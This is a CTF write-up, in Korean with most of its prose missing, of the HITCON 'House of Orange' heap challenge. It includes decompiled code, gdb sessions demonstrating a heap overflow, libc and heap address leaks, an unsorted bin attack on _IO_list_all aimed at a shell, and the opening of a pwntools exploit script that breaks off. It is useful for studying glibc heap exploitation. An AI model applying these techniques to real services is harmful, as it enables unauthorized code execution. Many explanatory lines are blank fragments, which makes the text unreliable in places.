


House of Orange[KR]

 Unknown macro: 'html'

Excuse the ads! We need some help to keep our site up.

 Unknown macro: 'html'

List

- 1 [Information](#)
 - 1.1 [Description](#)
 - 1.2 [Related file](#)
 - 1.3 [Source Code](#)
- 2 [Write up](#)
 - 2.1 [File information](#)
 - 2.2 [Binary analysis](#)
 - 2.2.1 [Main](#)
 - 2.2.2 [BuildTheHouse\(\) - 0x5640720E0D37](#)
 - 2.2.3 [SeeTheHouse\(\) - 0x5640720E0EE6](#)
 - 2.2.4 [UpgradeTheHouse\(\) - 0x05640720E107C](#)
 - 2.3 [Debugging](#)
 - 2.3.1 [Heap Overflow](#)
 - 2.4 [Structure of Exploit code](#)
 - 2.5 [Information for attack](#)
 - 2.5.1 [Leak - Overwrite of top chunk](#)
 - 2.5.2 [Leak - Libc address](#)
 - 2.5.3 [Leak - Heap address](#)
 - 2.6 [HouseOfOrange](#)
- 3 [Exploit Code](#)
- 4 [Flag](#)
- 5 [Related Site](#)

Information

Description

My teammate, Orange, need a house. Can you build it ?
nc 52.68.192.99 56746

[houseoforange](#)
[libc.so.6](#)

Related file

File list

- [houseoforange_22785bece84189e632567da38e4be0e0c4bb1682](#)
- [libc.so.6_375198810bb39e6593a968fcbcf6556789026743](#)

Source Code

Source code

Write up

File information

```
File information

autolycos@ubuntu:~/CTF/HITCON/houseoforange$ file ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682: ELF 64-bit LSB shared object, x86-64, version 1
(SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]
=a58bda41b65d38949498561b0f2b976ce5c0c301, stripped

autolycos@ubuntu:~/CTF/HITCON/houseoforange$ checksec.sh --file .
/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
RELRO          STACK CANARY      NX            PIE            RPATH          RUNPATH        FILE
Full RELRO     Canary found    NX enabled    PIE enabled     No RPATH       No RUNPATH     .
/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
autolycos@ubuntu:~/CTF/HITCON/houseoforange$
```

Binary analysis

- .

```
houseoforange

autolycos@ubuntu:~/CTF/HITCON/houseoforange$ ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice :
```

- "Build the house" .

```
Build the house

Your choice : 1
Length of name :10
Name :AAAAAAAAA
Price of Orange:+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange:1
Finish
```

- "See the house" .

See the house

Your choice : 2
Name of house : AAAAAAAAAA
Price of orange : 0

```
      _
     \|.-.-,
    //_. '
  _-""-/""-----..
 / . . . . . \
/ . . . . . \
|. . . . |
\ . $. . . $. . . |
\ . . . . . . /
 \ . . . O . . . /
  ' _ _ _ _ _ '

```

- "Upgrade the house" .

Upgrade the house

Your choice : 3
Length of name :20
Name:BBBBBBBBBBBBBBBBBBBB
Price of Orange: ++++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange: 2
Finish

Main

- .
 - PrintMenu() Menu .
 - UserInput() .
 - menuNumber , if() .

main()

```
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
    signed int menuNumber; // eax@2

    setSIGALE();
    while ( 1 )
    {
        while ( 1 )
        {
            PrintMenu();
            menuNumber = UserInput();
            if ( menuNumber != 2 )
                break;
            SeeTheHouse();
        }
        if ( menuNumber > 2 )
        {
            if ( menuNumber == 3 )
            {
                UpgradeTheHouse();
            }
            else
            {
                if ( menuNumber == 4 )
                {
                    puts("give up");
                    exit(0);
                }
            }
            LABEL_14:
                puts("Invalid choice");
        }
        else
        {
            if ( menuNumber != 1 )
                goto LABEL_14;
            BuildTheHouse();
        }
    }
}
```

BuildTheHouse() - 0x5640720E0D37

- .
 - gHouseCount 3 .
 - 4 .
 - HOUSE Heap .
 - .
 - 4096 size 4096 .
 - 4096 Heap houseDataname .
 - "Name" houseDataname .
 - "Name", "Price of Orange", "Color of Orange" .
 - gHouseCount .

BuildTheHouse() - 0x5640720E0D37

```
int BuildTheHouse()
{
    unsigned int size; // [rsp+8h] [rbp-18h]@4
    signed int colorNumber; // [rsp+Ch] [rbp-14h]@9
    HOUSE *houseData; // [rsp+10h] [rbp-10h]@4
    INFO *info; // [rsp+18h] [rbp-8h]@9

    if ( gHouseCount > 3u )
    {
        puts("Too many house");
        exit(1);
    }

    houseData = (house *)malloc(0x10uLL);
    printf("Length of name :");
    size = UserInput();

    if ( size > 4096 )
        size = 4096;

    houseData->name = (char *)malloc(size);
    if ( !houseData->name )
    {
        puts("Malloc error !!!");
        exit(1);
    }

    printf("Name :");
    NameInput(houseData->name, size);
    info = (Info *)calloc(1uLL, 8uLL);

    printf("Price of Orange:", 8LL);
    info->price = UserInput();
    colorPrint();

    printf("Color of Orange:");
    colorNumber = UserInput();
    if ( colorNumber != 56746 && (colorNumber <= 0 || colorNumber > 7) )
    {
        puts("No such color");
        exit(1);
    }

    if ( colorNumber == 56746 )
        info->color = 56746;
    else
        info->color = colorNumber + 30;

    houseData->house = info;
    gHouseData = houseData;
    ++gHouseCount;
    return puts("Finish");
}
```

- 2 Struct .

struct house

```
struct HOUSE
{
    struct Info *house;
    char *name;
};
```

struct info

```
struct INFO
{
    int price ;
    int color ;
};
```

SeeTheHouse() - 0x5640720E0EE6

- .
 - "gHouseDate->house->color" .
 - "56746" orange orange .
 - "56746" , 30~37 orange .
 - "56746" , 30~37 , .
 - Orange name, price .
 - Orange rand() Orange .

SeeTheHouse() - 0x5640720E0EE6

```
int SeeTheHouse()
{
    int v0; // eax@3
    int result; // eax@3
    int v2; // eax@8

    if ( !gHouseDate )
        return puts("No such house !");
    if ( gHouseDate->house->color == 56746 )
    {
        printf("Name of house : %s\n", gHouseDate->name);
        printf("Price of orange : %d\n", gHouseDate->house->price);
        v0 = rand();
        result = printf("\x1B[01;38;5;214m%s\x1B[0m\n", gOrangeImageArr[v0 % 8]);
    }
    else
    {
        if ( gHouseDate->house->color <= 30 || gHouseDate->house->color > 37 )
        {
            puts("Color corruption!");
            exit(1);
        }
        printf("Name of house : %s\n", gHouseDate->name);
        printf("Price of orange : %d\n", gHouseDate->house->price);
        v2 = rand();
        result = printf("\x1B[%dm%s\x1B[0m\n", (unsigned int)gHouseDate->house->color, gOrangeImageArr[v2 % 8]);
    }
    return result;
}
```

UpgradeTheHouse() - 0x05640720E107C

- .
 - gUpgradeCount 2 .
 - 3 .
 - gHouseDate .
 - "name" .
 - 4096 size 4096 .
 - NameInput() "gHouseDatenname" .
 - gHouseDatenname .
 - Heap Overflow .
 - Price, Color .
 - gUpgradeCount .

UpgradeTheHouse() - 0x05640720E107C

```
int UpgradeTheHouse()
{
    Info *info; // rbx@7
    unsigned int size; // [rsp+8h] [rbp-18h]@5
    signed int colorNumber; // [rsp+Ch] [rbp-14h]@7

    if ( gUpgradeCount > 2u )
        return puts("You can't upgrade more");
    if ( !gHouseDate )
        return puts("No such house !");

    printf("Length of name :");
    size = UserInput();
    if ( size > 4096 )
        size = 4096;

    printf("Name:");
    NameInput(gHouseDate->name, size);

    printf("Price of Orange: ", size);
    info = gHouseDate->house;
    info->price = UserInput();
    colorPrint();

    printf("Color of Orange: ");
    colorNumber = UserInput();

    if ( colorNumber != 56746 && (colorNumber <= 0 || colorNumber > 7) )
    {
        puts("No such color");
        exit(1);
    }

    if ( colorNumber == 56746 )
        gHouseDate->house->color = 56746;
    else
        gHouseDate->house->color = colorNumber + 30;
    ++gUpgradeCount;
    return puts("Finish");
}
```

Debuging

Heap Overflow

- **Heap Overflow Break pointf .**
 - 0x55555554daa : BuildTheHouse() "Name" Heap
 - 0x55555554dfe : BuildTheHouse() NameInput()
 - 0x55555554e0d : BuildTheHouse() calloc()
 - 0x55555555119 : UpgradeTheHouse() NameInput()
 - 0x5555555511e : UpgradeTheHouse() NameInput()

Break point

```
autolycos@ubuntu:~/CTF/HITCON/houseoforange$ gdb -q ./houseo*
Reading symbols from ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682...(no debugging symbols found)...
done.
gdb-peda$ b *0x555555554daa
Breakpoint 1 at 0x555555554daa
gdb-peda$ b *0x555555554dfe
Breakpoint 2 at 0x555555554dfe
gdb-peda$ b *0x555555554e0d
Breakpoint 3 at 0x555555554e0d
gdb-peda$ b *0x555555555119
Breakpoint 4 at 0x555555555119
gdb-peda$ b *0x55555555511e
Breakpoint 4 at 0x55555555511e
gdb-peda$
```

- "Build the house" .
 - Name 10 , malloc() 0x555555758030 .
 - calloc() Price, Color Heap .
 - 0x20byte Heap .

Build the house

```
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/autolycos/CTF/HITCON/houseoforange
/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
+++++
@      House of Orange      @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 1
Length of name :10

Breakpoint 1, 0x0000555555554daa in ?? ()
gdb-peda$ i r rax
rax          0x555555758030          0x555555758030
gdb-peda$ x/8gx 0x555555758030
0x555555758030:      0x0000000000000000      0x0000000000000000
0x555555758040:      0x0000000000000000      0x00000000000020fc1
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x0000000000000000
gdb-peda$ c
Continuing.
Name :AAAAAAAA
Breakpoint 2, 0x0000555555554dfe in ?? ()
gdb-peda$ x/8gx 0x555555758030
0x555555758030:      0x4141414141414141      0x00000000000000a41
0x555555758040:      0x0000000000000000      0x00000000000020fc1
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x0000000000000000
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000555555554e0d in ?? ()
gdb-peda$ x/8gx 0x555555758030
0x555555758030:      0x4141414141414141      0x00000000000000a41
0x555555758040:      0x0000000000000000      0x0000000000000021
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x00000000000020fa1
gdb-peda$ c
```


- "Upgrade the house" Heap Overflow .
 - "Length of name" 60 .
 - "Name" 'B' * 50, 'C' * 8 .
 - 0x555555758030 ~ 0x55555575806C .
 - 0x555555758050 price,color .
- .
 - Heap Overflow Libc address,Heap address .
 - Top chunk "Unsort bin attack" .

Upgrade the house

```
gdb-peda$ c
Continuing.
Price of Orange:100
+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange:1
Finish
+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 3
Length of name :60
Name:

Breakpoint 4, 0x000055555555119 in ?? ()
gdb-peda$ x/8gx 0x555555758030
0x555555758030:      0x4141414141414141      0x00000000000000a41
0x555555758040:      0x0000000000000000      0x00000000000000021
0x555555758050:      0x00000001f00000064      0x00000000000000000
0x555555758060:      0x0000000000000000      0x000000000000020fa1
gdb-peda$ ni
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCC
Breakpoint 5, 0x00005555555511e in ?? ()
gdb-peda$ x/8gx 0x555555758030
0x555555758030:      0x4242424242424242      0x4242424242424242
0x555555758040:      0x4242424242424242      0x4242424242424242
0x555555758050:      0x4242424242424242      0x4242424242424242
0x555555758060:      0x4343434343434242      0x0000000000a434343
gdb-peda$
```

Structure of Exploit code

- Payload .

Payload Flow

```
1. Libc, Heap address Leak
2. Unsorted bin attack
```

- .

Detailed description

1. Libc, Heap address Leak
 - a. Heap overflow large chunk
2. Unsorted bin attack

- payload .

List of information to check

1. Leaklibcaddress

Information for attack

Leak - Overwrite of top chunk

- **"Upgrade the house" Heap overflow Top chunk** .
 - Top chunk .
 - malloc()Top chunk sysmalloc() .
- **sysmalloc() Top chunk** .
 - Top chunk .
 1. MINSIZE (0x10) . (unsigned long) (old_size) >= MINSIZE
 2. need size + MINSIZE . (unsigned long) (old_size) < (unsigned long) (nb + MINSIZE))
 3. prev_inuse . prev_inuse (old_top)
 4. old_top +oldsize .

malloc.c -> sysmalloc() [ver. glibc 2.23]

```
/*
   If not the first time through, we require old_size to be
   at least MINSIZE and to have prev_inuse set.
*/

assert ((old_top == initial_top (av) && old_size == 0) ||
        ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end &
(pagesize - 1)) == 0));

/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
```

- **Break point** .
 - 0x55555554daa : BuildTheHouse() "Name" Heap
 - 0x55555554dfe : BuildTheHouse() NameInput()
 - 0x55555554e0d : BuildTheHouse() calloc()
 - 0x5555555511e : UpgradeTheHouse() NameInput()

Break points

```
gdb-peda$ b *0x55555554000 + 0xDAA
Breakpoint 1 at 0x55555554daa
gdb-peda$ b *0x55555554000 + 0xDFE
Breakpoint 2 at 0x55555554dfe
gdb-peda$ b *0x55555554000 + 0xE0D
Breakpoint 3 at 0x55555554e0d
gdb-peda$ b *0x55555554000 + 0x111E
Breakpoint 4 at 0x5555555511e
gdb-peda$
```

- **"BuildTheHouse" Heap** .

- Heap 16.

Create heap

```
gdb-peda$ r
Starting program: /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange
+++++
@          House of Orange          @
+++++
  1. Build the house
  2. See the house
  3. Upgrade the house
  4. Give up
+++++
Your choice : 1
Length of name :16
Breakpoint 1, 0x0000555555554daa in ?? ()
gdb-peda$ i r rax
rax          0x555555758030          0x555555758030
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x0000000000000000      0x0000000000000000
0x555555758040:      0x0000000000000000      0x00000000000020fc1
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x0000000000000000
0x555555758070:      0x0000000000000000      0x0000000000000000
0x555555758080:      0x0000000000000000      0x0000000000000000
0x555555758090:      0x0000000000000000      0x0000000000000000
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$ c
Continuing.

Program received signal SIGALRM, Alarm clock.
Name :AAAAAAAAAABB
Breakpoint 2, 0x0000555555554dfe in ?? ()
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x4141414141414141      0x000a424241414141
0x555555758040:      0x0000000000000000      0x00000000000020fc1
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x0000000000000000
0x555555758070:      0x0000000000000000      0x0000000000000000
0x555555758080:      0x0000000000000000      0x0000000000000000
0x555555758090:      0x0000000000000000      0x0000000000000000
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000555555554e0d in ?? ()
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x4141414141414141      0x000a424241414141
0x555555758040:      0x0000000000000000      0x0000000000000021
0x555555758050:      0x0000000000000000      0x0000000000000000
0x555555758060:      0x0000000000000000      0x00000000000020fa1
0x555555758070:      0x0000000000000000      0x0000000000000000
0x555555758080:      0x0000000000000000      0x0000000000000000
0x555555758090:      0x0000000000000000      0x0000000000000000
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$
```

- "UpgradeTheHouse" Top chunk .
 - Top chunk 0xfa1(3889) .
 - Top chunk 0x20fa1 .
 - Top chunk heap , malloc sysmalloc() .
 - Top chunk Free chunk Unsorted bin .
 - Free chunk fd, bk .

Overwrite for Top chunk

```
gdb-peda$ c
Continuing.
Price of Orange:100
+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange:1
Finish
+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 3
Length of name :70
Name:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB

Breakpoint 4, 0x0000555555555511e in ?? ()
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x4141414141414141      0x4141414141414141
0x555555758040:      0x4141414141414141      0x4141414141414141
0x555555758050:      0x4141414141414141      0x4141414141414141
0x555555758060:      0x4141414141414141      0x0a42424241414141
0x555555758070:      0x0000000000000000      0x0000000000000000
0x555555758080:      0x0000000000000000      0x0000000000000000
0x555555758090:      0x0000000000000000      0x0000000000000000
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$ set *0x555555758068 = 0xfa1
gdb-peda$ set *0x55555575806c = 0x0
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x4141414141414141      0x4141414141414141
0x555555758040:      0x4141414141414141      0x4141414141414141
0x555555758050:      0x4141414141414141      0x4141414141414141
0x555555758060:      0x4141414141414141      0x00000000000000fa1
0x555555758070:      0x0000000000000000      0x0000000000000000
0x555555758080:      0x0000000000000000      0x0000000000000000
0x555555758090:      0x0000000000000000      0x0000000000000000
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$
```

- "BuildTheHouse" Top chunk Heap .
 - Top chunk 4096 Heap .
 - sysmalloc() Heap 0x55f72a511010 .
 - Top chunk Free chunk , fd(Forward pointer), bk(Backward pointer) .
 - fd, bk .
 - fd,bk (0x7f68e8d2c7b8) 0x55f72a512010 .
 - 0x55f72a512010 = heap (0x55f72a511010) + heap size(0x1000, 4096)

Create unsorted bin

```
gdb-peda$ c
Continuing.
Price of Orange: 200
+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange: 2
Finish
+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 1
Length of name :4096
Breakpoint 1, 0x00005555555554daa in ?? ()
gdb-peda$ i r rax
rax          0x555555779010          0x555555779010
gdb-peda$ x/16gx 0x555555758030
0x555555758030:      0x4141414141414141      0x4141414141414141
0x555555758040:      0x4141414141414141      0x4141414141414141
0x555555758050:      0x00000020000000c8      0x4141414141414141
0x555555758060:      0x4141414141414141      0x0000000000000021
0x555555758070:      0x000000000000000a      0x0000000000000000
0x555555758080:      0x0000000000000000      0x00000000000000f61
0x555555758090:      0x00007ffff7dd1b78      0x00007ffff7dd1b78
0x5555557580a0:      0x0000000000000000      0x0000000000000000
gdb-peda$
```

Leak - Libc address

- "BuildTheHouse" Libc address .
 - Heap 1024 .
 - Heap (0x5555557580d0) .
 - sysmalloc() Heap .
 - "0x5555557580d0", "0x5555557580d8" main_arena .
 - "Name" 8 .

Write 8 characters in the Heap

```
gdb-peda$ c
Continuing.
Name :HEAP

Breakpoint 2, 0x0000555555554dfe in ?? ()
gdb-peda$ c
Continuing.

Breakpoint 3, 0x0000555555554e0d in ?? ()
gdb-peda$ c
Continuing.
Price of Orange:300
+++++
 1. Red
 2. Green
 3. Yellow
 4. Blue
 5. Purple
 6. Cyan
 7. White
+++++
Color of Orange:3
Finish
+++++
@      House of Orange      @
+++++
 1. Build the house
 2. See the house
 3. Upgrade the house
 4. Give up
+++++
Your choice : 1
Length of name :1024
Breakpoint 1, 0x0000555555554daa in ?? ()
gdb-peda$ i r rax
rax          0x5555557580d0          0x5555557580d0

gdb-peda$ x/10gx 0x5555557580d0
0x5555557580d0:          0x00007ffff7dd2188          0x00007ffff7dd2188
0x5555557580e0:          0x00005555557580c0          0x00005555557580c0
0x5555557580f0:          0x0000000000000000          0x0000000000000000
0x555555758100:          0x0000000000000000          0x0000000000000000
0x555555758110:          0x0000000000000000          0x0000000000000000
gdb-peda$ x/gx 0x00007ffff7dd2188
0x7ffff7dd2188 <main_arena+1640>:          0x00007ffff7dd2178
gdb-peda$
```

- "Name" 8 .
 - "LEAKADD".
 - "0x0a4444414b41454c" .
 - "0x5555557580d8" .
- "See the house" "0x5555557580d8" .
 - Leak data : ?!???

Leak libc address

```
gdb-peda$ c
Continuing.
Name :LEAKADD

Breakpoint 2, 0x0000555555554dfe in ?? ()
gdb-peda$ x/10gx 0x55555557580d0
0x55555557580d0:      0x0a4444414b41454c      0x00007ffff7dd2188
0x55555557580e0:      0x000055555557580c0      0x000055555557580c0
0x55555557580f0:      0x0000000000000000      0x0000000000000000
0x5555555758100:      0x0000000000000000      0x0000000000000000
0x5555555758110:      0x0000000000000000      0x0000000000000000
gdb-peda$ c
Continuing
Breakpoint 3, 0x0000555555554e0d in ?? ()
gdb-peda$ c
Continuing.
Price of Orange:400
+++++
 1. Red
 2. Green
 3. Yellow
 4. Blue
 5. Purple
 6. Cyan
 7. White
+++++
Color of Orange:4
Finish
+++++
@          House of Orange          @
+++++
 1. Build the house
 2. See the house
 3. Upgrade the house
 4. Give up
+++++
Your choice : 2
Name of house : LEAKADD
?!???
Price of orange : 400

      _
     \|.-.-,
    //_. '
  _.-"-/"-----..
 / . . . . . \
/ . . \ . . / . . \
|. ____\ . / ____|
 \ . . . . . |
 \ . . . . . /
  \ . . . . . /
   '-._.-._.-'

+++++
@          House of Orange          @
+++++
 1. Build the house
 2. See the house
 3. Upgrade the house
 4. Give up
+++++
Your choice :
```

Leak - Heap address

- "Upgrade the house" Heap address .

- "0x5555557580d0" 16 byte Heap .
- Leak "Name" 15 .
- **"See the house" heap address** .
 - Leak data : ??uUUU

Leak for Heap address

Name of house : LEAKADD

?!???

Price of orange : 400

```

      _
     \|/ .-- ,
    // _.'
  .-""-/""-----..
 / . . . . . \
/ . . \ . . / . . \
|. ____ \ . / ____ |
 \ . . . . . |
 \ . . . . . /
  '-._.-._.-._.-'

```

```

+++++
@           House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 3
Length of name :1024
Name:BBBBBBBBBBBBBBB

```

```

Breakpoint 4, 0x0000555555555511e in ?? ()
gdb-peda$ x/10gx 0x5555557580d0
0x5555557580d0:          0x4242424242424242          0x0a42424242424242
0x5555557580e0:          0x00005555557580c0          0x00005555557580c0
0x5555557580f0:          0x0000000000000000          0x0000000000000000
0x555555758100:          0x0000000000000000          0x0000000000000000
0x555555758110:          0x0000000000000000          0x0000000000000000
gdb-peda$ c
Continuing.
Price of Orange: 500
+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange: 5
Finish
+++++
@           House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 2
Name of house : BBBBBBBBBBBBBBB
??uUUU
Price of orange : 500

```



```

      \/.--.,
      //_. '
    _-""-/"-----..
  / . . . . . \
 / . . . . . \
 | . . . . |
 \ . $$ . . . $$ . .. |
 \ . . . . . /
  \ . . . O . . . /
   '-._.-._.-._.-'

```

```

+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice :

```

HouseOfOrange

- **Unsorted bin attack HouseOfOrange .**
 - "0x55555555119" Break point .
 - "Length of name" "2048" .
- **main_arena Unsorted bin .**
 - Unsorted bin 0x5555557584f0 .
 - , 0x5555557584f0 .
 - NamalInput() "0x5555557580d0" .
 - 0x5555557584f0 1056 .
 - Ex) "A" * 1056 + "B" * 32
 - Unsorted chunk .

- .
 - freechunkprev_size = "/bin/sh"
 - freechunksize = 0x61
 - freechunkfd = " "
 - freechunkbk = "_IO_list_all" - 0x10

Set the Fake chunk

```
Breakpoint 4, 0x0000555555555511e in ?? ()
gdb-peda$ set *0x5555557584f0 = 0x6E69622F
gdb-peda$ set *0x5555557584f4 = 0x0068732F
gdb-peda$ set *0x5555557584f8 = 0x61
gdb-peda$ set *0x5555557584fc = 0x0

gdb-peda$ p &_IO_list_all
$1 = (struct _IO_FILE_plus **) 0x7ffff7dd2520 <_IO_list_all>
gdb-peda$ p/x 0x7ffff7dd2520 - 0x10
$2 = 0x7ffff7dd2510
gdb-peda$ x/4gx 0x7ffff7dd2510
0x7ffff7dd2510:      0x0000000000000000      0x0000000000000000
0x7ffff7dd2520 <_IO_list_all>:      0x00007ffff7dd2540      0x0000000000000000
gdb-peda$ set *0x555555758508 = 0xf7dd2510
gdb-peda$ set *0x55555575850c = 0x7fff
gdb-peda$ set *0x555555758500 = 0xAAAA
gdb-peda$ set *0x555555758504 = 0x0
gdb-peda$ x/8gx 0x5555557580d0 + 1040
0x5555557584e0:      0x4141414141414141      0x4141414141414141
0x5555557584f0:      0x0068732f6e69622f      0x0000000000000061
0x555555758500:      0x000000000000aaaa      0x00007ffff7dd2510
0x555555758510:      0x000000000000000a      0x0000000000000000
gdb-peda$
```

- "Build the house" Unsorted chunk "_IO_list_all" . (Unsorted bin attack)
 - "_IO_list_all" main_arena.top .
 - shell .

Unsorted bin attack

```
gdb-peda$ c
Continuing.
Price of Orange: 700
+++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
+++++
Color of Orange: 7
Finish
+++++
@          House of Orange          @
+++++
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
+++++
Your choice : 1
*** Error in `/home/lazencax0/CTF/HITCON/houseoforange/houseoforange': malloc(): memory corruption:
0x00007ffff7dd2520 ***
===== Backtrace: =====
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ffff7a91184]
/home/lazencax0/CTF/HITCON/houseoforange/houseoforange(+0xd6d)[0x55555554d6d]
/home/lazencax0/CTF/HITCON/houseoforange/houseoforange(+0x1402)[0x55555555402]
```

```

/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830]
/home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0xb19)[0x555555554b19]
===== Memory map: =====
555555554000-555555557000 r-xp 00000000 08:01 139888 /home/lazenca0x0/CTF/HITCON
/houseoforange/houseoforange
555555756000-555555757000 r--p 00002000 08:01 139888 /home/lazenca0x0/CTF/HITCON
/houseoforange/houseoforange
555555757000-555555758000 rw-p 00003000 08:01 139888 /home/lazenca0x0/CTF/HITCON
/houseoforange/houseoforange
555555758000-55555579b000 rw-p 00000000 00:00 0 [heap]
7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0
7ffff0021000-7ffff4000000 ---p 00000000 00:00 0
7ffff77f7000-7ffff780d000 r-xp 00000000 08:01 660756 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff780d000-7ffff7a0c000 ---p 00016000 08:01 660756 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff7a0c000-7ffff7a0d000 rw-p 00015000 08:01 660756 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 655589 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 655589 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 655589 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 655589 /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0
7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 655548 /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7fd5000-7ffff7fd8000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ff8000 rw-p 00000000 00:00 0
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 655548 /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 655548 /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffff7fff000-7ffff7fff000 rw-p 00000000 00:00 0
7fffffffde000-7fffffffde000 rw-p 00000000 00:00 0 [stack]
fffffffffff60000-fffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

```

```

Program received signal SIGABRT, Aborted.
Stopped reason: SIGABRT
0x00007ffff7a42428 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:54
54      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
gdb-peda$ x/4gx 0x7ffff7dd2510
0x7ffff7dd2510:      0x0000000000000000      0x0000000000000000
0x7ffff7dd2520 <_IO_list_all>:      0x00007ffff7dd1b78      0x0000000000000000
gdb-peda$ p &main_arena.top
$14 = (mchunkptr *) 0x7ffff7dd1b78 <main_arena+88>
gdb-peda$
gdb-peda$ x/gx 0x00007ffff7dd1b78
0x7ffff7dd1b78 <main_arena+88>:      0x000055555577a010
gdb-peda$

```

- **HouseOfOrange**



Page

[House of Orange\[Korean\]](#)

Exploit Code

Exploit.py

```

from pwn import *

p = process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def Build(len,name):
    p.recvuntil('Your choice : ')
    p.sendline('1')
    p.recvuntil('Length of name : ')
    p.sendline(str(len))
    p.recvuntil('Name : ')
    p.sendline(name)

```

```

    p.recvuntil('Price of Orange:')
    p.sendline(str(100))
    p.recvuntil('Color of Orange:')
    p.sendline(str(1))

def See():
    p.recvuntil('Your choice : ')
    p.sendline('2')
    tmp = p.recvuntil('Price')
    data = (tmp.split('\n')[1]).ljust(8, '\x00')
    return data

def Upgrade(len, name):
    p.recvuntil('Your choice : ')
    p.sendline('3')
    p.recvuntil('Length of name : ')
    p.sendline(str(len))
